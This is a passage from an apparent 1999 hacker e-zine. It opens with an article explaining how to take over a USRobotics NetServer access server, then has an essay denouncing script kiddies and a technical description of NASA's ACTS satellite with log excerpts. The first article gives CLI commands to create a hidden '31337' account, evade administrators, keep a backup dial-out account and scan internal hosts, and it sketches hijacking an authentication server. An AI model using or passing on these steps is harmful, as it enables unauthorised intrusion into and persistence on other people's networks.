Address Range: 0 - 0 Filter Zones ENABLED (D) IP Usage: ENABLED Address Selection: ASSIGN Remote IP Address: 0.0.0.0/H (D) IP Routing: NONE Default Route Option: DISABLED IP RIP Routing Protocol: RIPV1 IP RIP Routing Policies: SEND_DEFAULT SEND_ROUTES SEND_SUBNETS ACCEPT_DEFAULT SILENT SPLIT_HORIZON POISON_REVERSE FLASH_UPDATE SEND_COMPAT RIPV1_RECEIVE RIPV2_RECEIVE IP RIP Authentication Key: IPX Usage: ENABLED (D) IPX Address: 0 IPX Routing: RESPOND (D) IPX WAN Usage: DISABLED (D) Spoofing: ENABLED PARAMETERS for NETWORK PPP USERS Max Channels 1 (D) Channel Decrement Percent: 20 (D) Channel Expansion Percent: 60 (D) Expansion Algorithm: LINEAR (D) Receive ACC Map: 0 (D) Transmit ACC Map: 0 (D) Compression Algorithm: AUTO (D) Compression Reset Mode: AUTO (D) Min Compression Size: 256 (D) ........... Now we are going to configure an account for ourselves -- this is nessasary so we can establish a good PPP connection and blend in with the other users on the network, we can then implement the tools on our own box for mapping the internal network, or the darkcyde of the firewall, we can then find all the other connected boxes on the network. So, when we configure our network account we need to consider the following, IP usuage, routing, DNS servers, cloaking, spoofing, _stealth_. On a net connected netserver you can often use your own specified dns server, but the network traffic in the arp tables etc will reveal abnormal network activity to a nosey administrator. The best thing to do is use the servers internal DNS server, you can later own the DNS server aswell :> Also, if the network is firewalled (which will always be the case) Extrenal use of a DNS server would arouse susspisions of the administrator(s). The default settings for PPP access on netservers is standard PPP protocol, sometimes the administrator would have enabled CHAP or PAP for login authentification, and this will usually be authentificated by another box on the network, therefore you are pretty screwed unless you a) own the authentification server or b) setup your account for standard PPP login authentification. -- the only disadvantage with this would be that the account you created would stick out from the others a little more. Right, time to make the account. In this case, because the majourity of account names in the user list are numerical we will create a numerical account, yep you guessed it, we will create an account called '31337'... --------------- session:add user.... CLI - Missing Required Argument(s): This field is a User Name The expected format is an ASCII string. } options The maximum size is 32 characters This name must be unique. ............... ENABLED NETWORK_SERVICE TYPE LOGIN_SERVICE PASSWORD You can specify what kind of service you are going to add for yourself, just keep it to PPP and telnet for the time being, thats what the other users have, so thats what we'll have. Differnet options for type of service include: CALLBACK DIAL_OUT LOGIN MANAGE NETWORK The types CALLBACK and DIAL_OUT are mutually exclusive. So now we are ready to add our user.. The command line is as follows: ------- session:add user <31337> login_service telnet password ------- Now to check to see if the user 31337 was addded ok, check the user list.. with the command ..... 31337 TELNET PPP (D) INACTIVE NETWORK(D) ..... Right, we got the username there, now we have to activate our capabilitys on the network. For this we use the command. session:set user 31337 CLI - Missing Required Argument(s): This field is a KEYWORD. The possible values are: ALTERNATE_PHONE_NUMBER MESSAGE SESSION_TIMEOUT CALLBACK_TYPE MODEM_GROUP TYPE EXPIRATION OUTPUT_FILTER IDLE_TIMEOUT PASSWORD INPUT_FILTER PHONE_NUMBER } If you are super el8 you can add a phone number in your userfile. Now, this is optional, and not advisable, but if you want to set your own IP address (good for subnetting) you can configure your account as follows, I think I have also done this so you're IP activitys are not loged in the arp cache. ....... session:add framed_route user 31337 ip_route (numerical IP address goes here) ....... We also need to enable the user, the command should be somthing like this: session:set user 31337 type network session:set user 31337 type telnet session:set user 31337 type ppp session:set user 31337 type login ....... Now, we have our user setup it's time to test it out. Log out of the system reset modems, then dial back in. this time login as 31337 with your chossen password, which by the way for some reason has to be the same length as the user account name. Once loged in you should get an automatic PPP connection.. enable you're PPP client with the internal specified DNS server default routes etc, and there you go. Test the DNS server by pinging/telneting whatever to a few host[names] You now have a secure PPP connection to your host (the USRobotics NetServer) You can now begin to take a look at what is on the internal network, It is preferable to use a port mapper such as nmap or similar, you will be supprised at the boxes you will find connected to the network, as in most internal networks you will find SunOS/Solaris boxes, UNIX boxes (the netserver is based on unix -- but i forgot to mention that) you will also find cisco routers/switches, jet-directs, printers, everything you would expect to find on an internal LAN network. Now we've established out net connection, its time to take a look at the further things you can do with the netserver system. If the network has a nice amount of modems in the modem serial pool (you can see this in the show commands) we can configure our account for dialout aswell. This can be done by using the commands. The best thig to do here is set up a seperate account fro dialout only, therefore if the admin notices that account you wont loose your access alltogether. Once you have set up your seperate account with login_user and dial_out settings, you can then telnet back to the netserver (IP obtained via scan --- or the command show system) Once telneted back to the netserver you can login with your dialout account user name, and then attach to the modem pool an control the modems just as you would in a terminal screen, AT etc. You can then dialout whilst you are similtaniously online aswell. As in most OSs, the netserver system operates on a multi-user security access level basis. There are differnet levels of access for example, admin --- super-user manager --- manager user123 --- standard user guest --- guest access default --- default settings To look at this in more detail, here are the settings for the admin account and also the settings for the default accounts: -------- session:show user admin INFORMATION FOR USER: admin Status: ACTIVE Type: LOGIN MANAGE Expiration: 00- -0000 Message: Callback Type: NORMAL Phone Number: Alternate Phone Number: Input Filter: Output Filter: Modem Group: all (D) Session Timeout 0 Idle Timeout: 0 PARAMETERS FOR LOGIN USERS: Login Service: TELNET (D) TCP Port: 23 (D) Terminal: vt100 (D) Login Host: 000.000.000.000 Host Type: SELECT ....... session:show user default INFORMATION FOR USER: default Status: INACTIVE Type: NETWORK Expiration: 00- -0000 Message: Callback Type: NORMAL Phone Number: Alternate Phone Number: Input Filter: Output Filter: Modem Group: all Session Timeout 0 Idle Timeout: 0 PARAMETERS FOR NETWORK USERS: Network Service PPP Header Compression: TCPIP MTU: 1514 Send Password: Appletalk: ENABLED Appletalk Address Range: 0 - 0 Filter Zones ENABLED IP Usage: ENABLED Address Selection: ASSIGN Remote IP Address: 0.0.0.0/H IP Routing: NONE Default Route Option: DISABLED IP RIP Routing Protocol: RIPV1 IP RIP Routing Policies: IP RIP Authentication Key: IPX Usage: ENABLED IPX Address: 0 IPX Routing: RESPOND IPX WAN Usage: DISABLED Spoofing: DISABLED PARAMETERS for NETWORK PPP USERS Max Channels 1 Channel Decrement Percent: 20 Channel Expansion Percent: 60 Expansion Algorithm: LINEAR Receive ACC Map: 0 Transmit ACC Map: 0 Compression Algorithm: AUTO Compression Reset Mode: AUTO Min Compression Size: 256 ........ You can also see what is going on on the netserver at the time you are on it bye issueing the following command: ---------- session:list processes PROCESSES Index Name Type Status 2001 NameManager System Inactive 12001 Console System Inactive 22001 FileManager System Inactive 32001 Configurator Application Inactive 42001 Main Application Active 52001 MIB Registrar Application Inactive 62001 Config File Manager Application Inactive 72001 IP Forwarder Forwarder Inactive 82001 UDP Process Application Inactive 92001 TCP Process Application Inactive a2001 Telnet Application Inactive b2001 SLIP Process Application Inactive c2001 TFTP Process c2001 Application Inactive d2001 IP Spoofing Application Inactive e2001 Proxy NetBIOS Application Inactive f2001 RoboExec NetManagement Application Active 102001 User Manager Application Inactive 112001 SNMP Agent Application Inactive 122001 Event Handler Application Inactive 132001 Point to Point Protocol Application Inactive 142001 Domain Name System Application Inactive 152001 Filter Manager Process Application Inactive 162001 IPX Forwarder Inactive 172001 IPX RIP Application Inactive 182001 SAP Application Inactive 192001 IPX DIAG Application Inactive 1a2001 IPX NETBIOS Application Inactive 1b2001 IPX SPOOF Application Inactive 1c2001 IPX WAN Application Inactive 1d2001 AppleTalk Forwarder Forwarder Inactive 1e2001 AppleTalk NBP/ZIP Application Inactive 1f2001 AppleTalk Spoofer Application Inactive 202001 AppleTalk RTMP Application Inactive 212001 AppleTalk ARAP Framing Application Inactive 222001 IPX/IP Dial-out Process Application Inactive 232001 File System Compaction ProcessApplication Inactive 242001 Console Driver Driver Inactive 252001 Loopback Driver Driver Inactive 262001 Ethernet Driver Driver Inactive 272001 Modem Port Driver Driver Inactive 282001 Call Init Process Application Inactive 292001 IP Routing Instance Application Inactive 2a2001 CLI Application Inactive 2b2004 CLI 2b2004 Application Inactive ------------- The commands on the shell interface are fairly self explanitory and all offer a limited amount of info in help topics. It appears that on some netservers, where server authentification is enabled, if an account is set up, the username and login details are automaticaly transfered to the authentification server, so any other box on that network connected to the authentification server will allow you to login with the username you set up on the netserver, nice big security hole for the admins to ponder over. There are a few obsticles that you may have to overcome if you find such a server, exapmple: most netservers are hidden nicley behind firewalls, aswell as outgoing packets are sent through proxy servers. Again, you have options here, you could a) attempt to get admin on the proxy servers and the routers, or b) -- the more favourable option would be to re-configure your IP routing in the network setup configuration on the netserver. This means you would bypass any proxy/security servers that are present on that network. An idea I had a while back when dealing with authentification servers is to find the the local authentification server on the network, and mirror the software/OS etc that the authentification server uses. Lets say the authentification server was 123.111.33.6.. (After you have replicated the server) -- first temporarily take the server offline in the ip routing configuration, then configure a user account with the fixed IP of 123.111.33.6 (the authentification server).. login as that user when you are on the box you set up with the authentification software, the idea is that all authentification packets will be sent to your box, effectivly making you (the host) the authentification server. It's just an idea anyhow, I've never tried it out, but I'm sure somthing like that would work. Anyhow, thats it for this article, I hope you enjoyed it. Take it easy and remeber to visit my website :) --- hybrid. --- http://hybrid.dtmf.org --- ___ ___ _____.___.____________________ ____________ hybrid@dtmf.org / | \\__ | |\______ \______ \/_ \______ \ hybrid@ninex.com / ~ \/ | | | | _/| _/ | || | \ hybrid@phunc.com \ Y /\____ | | | \| | \ | || ` \ ---------------- \___|_ / / ______| |______ /|____|_ / |___/_______ / \/ \/ \/ \/ \/ shouts fly out to: [ D4RKCYDE ] [ B4B0 ] [ 9X ] [ PHUNC ] [ DTMF ] [ MED ] [ zomba ] [ downtime ] [ jasun ] [ substance ] [ tip ] [ gb ] [ ph1x ] [ jorge ] [ lowtek ] [ wirepair ] [ psyclone ] [ oeb ] [ siezer ] [ infidel ] [ knight ] +++ NO CARRIER -----BEGIN PGP PUBLIC KEY BLOCK----- Version: PGPfreeware 5.0i for non-commercial use Comment: I Encrypt, Therefore I Am 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 =f9ac -----END PGP PUBLIC KEY BLOCK----- -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ Disgust En-Mass ]::[OO--[ by shiloh ]---[ shiloh@hurontario.net ]:: -->[OO]:::::::::::::::::::::::::::::::::::::::::::[ http://i.am/shiloh ]::::: Disgust En-Mass. by shiloh - June 28, 1999 It wasn't that long ago that I was a starry-eyed kid, who followed the scene blindly. But it also wasn't that long ago that so-called hackers had morals, of a kind. There was an unspoken collective agreement that hacking actually stood for something worth-while. Somehow the term hacking has been seamlessly forever misdefined by all the cracker/fraudulent kiddies out there. What ever happened to the freedom of information? What ever happened to the righteousness behind a good hack? Somehow young pre-teens have grown up on exploits and power-trips. Somehow the latest crack has been given the title of a "hack" and we all spread the word. But that's not what hacking is and never has been. Years ago I remember sitting in a backwards channel on a not-so-recommended corner of IRC arguing over the definition of a hacker. hacker (n.) 1. one who works as an individual or as part of a team to gain access to information otherwise not available to the public, under the belief that all information is and should be public knowledge. 2. one who works as an individual or as part of a team to bring forward into the public eye the flaws and loopholes present in current so-called secure systems. When we happened on that one, there was still some semblance of truth to it. There were still those we could point out who worked under the guidelines of such statements, rather than for the simple purpose of being able to "0wn" a system and then leave their mark, possibly destroying pertinent data in the process. With the new millennium rapidly descending upon us, and the possibility of the end of the world, most wanna-be hackers are just out for a name for themselves. They want their alias flashed across the web, they want their faces in the news. They like the idea of a stack of newspaper clippings with THEIR alias in it, because they would only agree to be quoted if "their identity remains unknown". These so-called hackers are simply mislabeled. They're not hackers. They're something that no one really wants to relate to, but deep inside knows they are. These script-kiddies, who steal other people's work and use it to crack into a system, are simply one thing collectively: criminals. "... a California consulting firm, Computer Economics Inc., issued a report June 18 that estimated business losses of $7.6 billion to virus and 'worm' attacks in the first half of this year alone. " (Taken from the on-line The I nquirer, an article Sunday June 27, 99 - http://www.phillynews.com/inquirer/99/Jun/27/front_page/HACK27.htm There is no end to the amount of damage caused by these people working in the name of hacking. They easily slip into systems, through glaring flaws in the security, and then wreck havoc. The worst part is? They're proud of it. They're 14, 15, 16 years old for the most part and they brag to their friends about it. Common-place today is what is best known as Web-hacking, where an individual or group will enter a system and re-write www/html files to put their name on the web. Normally such edited files will include nasty threats, proclamations of superiority, shout-outs to friends, disturbing graphics and if we - the viewing audience - are lucky, there will also be a group logo, such as the Keebler Elves 0wned icon. It's criminal. What is the betterment to anyone by this? Sure, the site goes off-line, the administrators spend time and money checking into their security, and the police/FBI make a half-hearted effort at tracking down the vandals. It's an electronic form of tagging. That's all it is. WWW pages are just another form of large down-town brick buildings eager for a coat of spray-paint. I suppose what gets to me the most - the real clincher is - rarely do these kids get in by their own devices. It's usually some exploit they picked up from slashdot or bugtraq, written by maybe even a friend of theirs, but not them, and put to use after multiple testings of on-line IRC unfortunates. In all honesty, I'm not computer illiterate and am capable of running an executable file on my *nix machine. It wouldn't be so hard for me to crack into any number of severely crippled security-wise web pages and maybe even post this article. It's something I've written and put my own effort into - why shouldn't I plaster is all over the web for the world to read? Maybe because there's a little bit of morality in me. I wouldn't break into my next-door neighbor's house and leave it on their kitchen table for them to read, or wallpaper their house with it. I wouldn't break into the Police Station's file room and put one in every case folder for someone to happen upon later. Why should I break into a company web site and plaster their page with my words, why should I attempt to 0wn an FBI site for the sole purpose of making a name for myself? When speaking with a long-time security consultant who has experience from the at-home aspect, on up into corporate Motorola and then back down to the level of local ISP, he shared a few words of wisdom "What you should do, as a hacker, is leave a file, maybe something called iwashere.txt - because then it's 8 characters and works in all platforms, including the out-dated DOS ones - with something to the effect that you broke into their system, have looked around, that they're not going to be able to track you, but you want them to know that you were here and then sign it with your on-line alias. After you do this to a number of sites, you're going to get the fame you want, and the sites are going to go about securing themselves just as they would if you'd edited their web page. It's probably still illegal, but you haven't caused any REAL damage." Over the years the term "hacking" has become one related closely to computer/ phone-crimes and credit-card fraud. The previously given definition has little chance of ever standing true again and those of us who remember the "old-school" days sit back silently and watch the youngsters quickly bury themselves in a world they just don't understand. Anarchy has yet to find a solid ground in our society and when one tries to live outside the walls of the norm, but insists on leaving trails inside, there's only one place to end up. -->[OO]:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: -->]OO[:[ ACTS-Satelites ]:::::::[OO--[ by lowtek ]--[ lowtek@l0wtek.org ]::: -->[OO]:::::::::::::::::::::::::::::::[ http://deadprotocol.org/lowtek ]::::: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- |The World of the Advanced Communications Technology Satellite... | -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ACTS-Operations and structure -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- written by lowtek lowtek@deadprotocol.org lowtek@l0tek.org ******************************************** Advanced Communications Technology Satellite ******************************************** The ACTS satellite network was depelopted and schedualed for launch on Febuary 3, 1993 It is located in the Ka band at around 18-31 ghz and is in geosynchronous orbit aka the clark belt (22,300 miles above earth.) The ACTS satellite has many features that are not yet avalible to the public satellite market and shall continue to lead major satellite research towards it. This satellite was a result of the research done by many military and government operations that wanted to work on specific satellite projects to lead the public satellite verndors. They work on specific projects such as mobilie terminals, ATM linking via satellite, SOnet, and many other large network communications useage. -=-=-=-=-=-==-=-= Features of ACTS: -=-=-=-=-=-=-=-=- .o 110-Mbps time division Multiple Access .o Digital regeneration and Switching on board the satellite .o Multi Beam Anteana's .o BaseBand Processor -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= There are currently many earth station developments going on in means of the ACTS satellite such as the following: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= -=-=-=-=-=-=-=-=- | The ACTS T1 VSAT| -=-=-=-=-=-=-=-=- Is basically The main earth Station that provides means with communicating with the satellite and most of its functions on board. -=-=-=-=-=-=-=-=-=-=-=-=- | The ACTS Mobile Terminal| -=-=-=-=-=-=-=-=-=-=-=-=- Is away of achieving the goal of making tremendous speeds of satellite data well on the road and making it easier to communicate world wide. This earth station will be put into use with things such as International Hostpitals and also Telemedicine, Quality Audio, Military, Secure Communications and Many Aeronautical Applications such as Jets, Missiles and other aero mobile units. -=-=-=-=-=-=-=-=-=-=-=-=-=- |The Aeronaticaul Experiment| -=-=-=-=-=-=-=-=-=-=-=-=-=- This Station is similar to the Mobile Station in that it is on the run but in a different platform of the word run. Here we are talking about in the midst of soaring 5000 miles high and transmitting a signal to the satellite for navigation, radar, enemy persuit. -=-=-=-=-=- |ACTS MASCOM| -=-=-=-=-=- Is a Station that would let you manipulate the steering of a vehical in persue this was tested at Fort Leavenworth with a Hummer to test the Electronic Steering. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- |Broad Band Aeronatical Terminal| -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The Broad Band terminal allows the satellite to upink many things at the same time such as 2 conversations on the telephone and compressed 2 way video also full resolution of Television to the air craft. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= |INTEX Ka Band Experimental Satellite Ground Terminal| -=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This station is mainly one to help out with all of ACTS other experiments it provides measurement of various signal quality on the satellite link quality. Also is used to evaluate data compresion and Compares digital modulation and coding data. -=-=-=- |HBR/LET| -==-=-= High Burst Rate Link Evaluation Terminal is used as a safty device to watch over the ACTS satellite's performace of the microwave switch matrix mode. This Terminal has statistics about the satellites rain fade and measured quality of all links. -=-=-=-=-=-=-===-=-=-=-=-=- Well there are more in the proccess being made as I speak so look forward for an update... -=-=-=-=-=-=-=-=-=-=-=-=-=- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Why the Ka band? -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- You may be asking, "why in the world is this satellite operating in the Ka Band?" Well ACTS is the first satellite to actually transmit in the Ka band and because of this people have to watch the weather 24/7 in little rooms so they know when to notify the military if it will have bad signaling from the rain... The reason it is placed around the Ka band is because it has a 2.4 spectrum avalible. This is is 5 times fater than at lower frequncey bands such as where LEOS orbit around 400 to 1000 miles above earth. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Spectrums Analysis and Explenation -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This section explians the Spectrum a little more than I have done at the top so hang with me. The word "Spectrum" refers to a range of radio freqs that are used, or a portion of radio waves to make phone calls or transmit certain data. A freqency is the number of times each second that each radio wave completes a cycle. There are many Spectrums that are broken up into bands by the FCC. For example: Cordless phones are assigned to the 46 and 49 million cycle (hertz) per second. A "hertz" refers to one cycle of a radio wave. The higher the frequency, the more precious it is and this is why the Ka band at 30/20 ghz is a little more precious and is checked for weather hourly I have included the following weather analysys off NASA's server to show an example: -----------------------------------\ |-| | \ | | | USA \/ | | | | | | | | | | | | \ \ -----------------------------------------\ \ \_\ <-------- Bad Weather Quickly The NOC Is Notified and The ACTS Satellite sits and waits for the weather to pass The data is straight from the BBP of the satellite which transmits the data to the NASA Glen Research Center Mater Control Center VAX where it is kept on record for future research. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= MASTER CONTROL STATION ALARMS (Alarm Severity: I-Info., S-Status, E-Error, W-Warning, F-Fatal) Term# Date Time Severity Subsystem Msg Type Msg# Alarm Text ___________________________________________________________________________ ___________________________________________________________________________ 3 8/23/99 9:22:23 S LBR 11 17 Traffic terminal #3 is synchronized 3 8/23/99 9:58:12 S LBR 10 33 East & west scan beam refresh sequence ended 3 8/23/99 10:12:13 S LBR 10 61 LBR EXECURE buffer now available 3 8/23/99 10:45:43 E LBR 11 1 Traffic terminal #3 is at loss of synchronization state This represents what happens when something goes wrong with anything in or on the satellite. Now here all we have are minor problems that happen durring the signaling of the satellite hence the "Traffic terminal #3 is at loss of synchronization state". -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The Following are of N channel circuit activity reports from the NASA computer system. These represent successful and failed connection attempets to the N channel Circuits: N Channel Circuits - Successful Connections Orig Start Circuit Call Destination Orig Channel Circuit Number Term# Date Time Setup Duration Term# Number Type Channels ________________________________________________________________________________________ ________________________________________________________________________________________ 6 8/23/95 19:53:21 1 1049 6 4 1 2 6 8/23/95 19:58:57 2 87 1 2 2 2 N Channel Circuits - Failed Connections Orig Start Circuit Destination Orig Channel Circuit Number Reject Reject Term# Date Time Setup Term# Number Type Channels Code Reason _____________________________________________________________________________________________ _____________________________________________________________________________________________ 1 8/23/95 13:00:58 1 21 110 2 2 31 Destination Terminal Busy 1 8/23/95 15:33:46 1 2 787 2 24 41 Destination Terminal Shutdown -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Singale channel circuit Activity -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- This is a list of the connections of "Voice Channel" Activitys these show the destiniation earth station numbers and the channel number also the circuit type that failed or succeded well routering to the destination: Voice Circuit-Successful Connections Start Call Destination Orig Channel Circuit Term# Date Time Duration Term# Number Type ______________________________________________________________________ ______________________________________________________________________ 1 8/23/95 10:35:54 33 6 786 2 1 8/23/95 12:07:58 38 2 786 2 1 8/23/95 19:06:23 600 2 786 2 Voice Circuit-Failed Connections Start Orig Dest Orig Circuit Reject Reject Date Time Term# Term# Channel# Type Reason Text _____________________________________________________________________________ _____________________________________________________________________________ 5/17/95 11:17:34 1 12 787 2 20 Satellite Busy: Insufficient Destination Uplink Capacity -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-= ACTS Anteana Reciver/Transiver -=-=-=-=-=-=-=-=-=-===-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=- The ACTS satellite has 5 anteana's ports for use in uplink and downlink testing and contstruction. This provides the MCS (Clevland Mater Control Center) to be able to measure the signal quality and test new uploading/ downloading tekniques and features. And to provide multisignaling within new projets of the ACTS. =-=-=-=-=-=-=-=-=- |BaseBand Processer| -=-=-=-=-=-=-=-=-= The Base Band Processer is the the mind of the communications routing features such as Voice Procssing, Video Signals, and Call Routing. This system provides many things to the end users of the satellite on Earth. It is said to be equal to a 5ess-2000 switch, and provides Time Division Multiplexing of Radion Signals of the uplink and downlink flexibility within the family of signaling. The BBP is programmed to make compatability within the messege routing system on heavy and slow days at work. The switching and routing of messeges are moved around at 64-kbps hence the ISDN onboard. ---------\ \-------- ---------- | | ---------- | ACTS | -> /--------| | ----------/ -- Anteana Ports When a Signal is transmitted to an Anteana on the ACTS it is compressed and when the BBP recieves it, it is almost simotaniously sent to the most unused downlink at that time and routed down into the earth stations reciever where from there it will be decompressed and sent on its way to reach its destination on the PSTN. Here is an example of what the BBP switch looks like with all of its routing features marked: ---------------------------------------------------------- ---------- ----------------------------------------------- |INPUT CHANNEL 1 | | | | OUTPUT CHANNEL 1 | | ____________ | | | | ------- | || | --------- | | | | | | | || DEMODS | | | | | | | |PING-PONG| /---------- | ||------------| |PING-PONG| | | | | --- |-- / --------- | | || 110/55 | | MEMORY |--- | | | | | -- MEMORY |--|| // || | || | ______| |-- | ------- | | | | || | 2K x | || || ------ || | DOWNLINK || MSPS | |------| 2K x | | | | || | | | || | 64 BITS | || || | | || ----- | BEAM ||------------| || | 64 BITS | | | | FEC || | BASBAND | | || --------- || || | FEC | || | | \ NO. 1 || | || |--------- | | | |___| ROUTING |___|--| -------- | -- -- | || | || | \ || | || | |______|DECODER|___ ___ --| | | | ------ENCODER-- --- MOD |---- / || | || ______ || | SWITCH | | || |PING-PONG| || | ------ 110/55|---- / || OR |-------- | | | || | | | || | |- | | | | MSPS || |/ || | || | | |_______|| | | | || | MEMORY |--- ------ | || --> || | || --------- | | | | | | | --- 2K x | ------ | --> ||------------| || | | | | | | | | ---| 64 BITS | | Uplink || 27.5/13.75 | || |PING-PONG| | | | | | | --------- | Beam || | ||_____| MEMORY |-- | | | | | | 1 || MSPS | ------- |--- | | | | | ||------------| | 2K X | | | | | | ||------------| | 64 BITS | | | | | | || 27.5/13.75 | |---------| | | | | | || | | | | | | || MSPS | | | *| | | ------------------------------------------------------------ |*--------- \ ----------------------------------------------- | \ | | ------------------------------------------------------------ | --------- | -------------------------------------------------- | || | | | | | | INPUT CHANNEL 2 || | CENTRAL | | | OUTPUT CHANNEL (2) | Uplink| ||_| | | | Identical to OUTPUT CHANNEL (1) | Beam | (INDENTICAL TO INPUT CHANNEL 1) | |PROCESSER|- -| | No. 2 | | | | | | --> | | | | | | ---------------------------------------------------------- | | -------------------------------------------------- --------- - This represents a signal uplinked to the satellites BBP system and what functions are going on and how it handles the /voice/data/ and downlinks it to the other subscriber of the ACTS terminal... The INPUT and OUTPUT channels (2) are identical to the top ones in that they are just another anteana data port for the enduser to connect to using his or her terminal... -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- The ACTS satellite will help satellite communications for years to come even though it was supposed to be a 4 year sat. We have expanded and now are learning a magnificent amount of data as the dawn of the millenium occurs this information will lead us in the way or maybe we are leading our selfs into just a big gigantic technological mess... these things we will never no but untill we do... we shall keep advancing... I leave you with The Satellite Accronym list provided by NASA: -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- List of Abreveations thanks to NASA: APPPENDIX A LIST OF ABBREVIATIONS -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- ACTS Advanced Communications Technology Satellite BBP Baseband 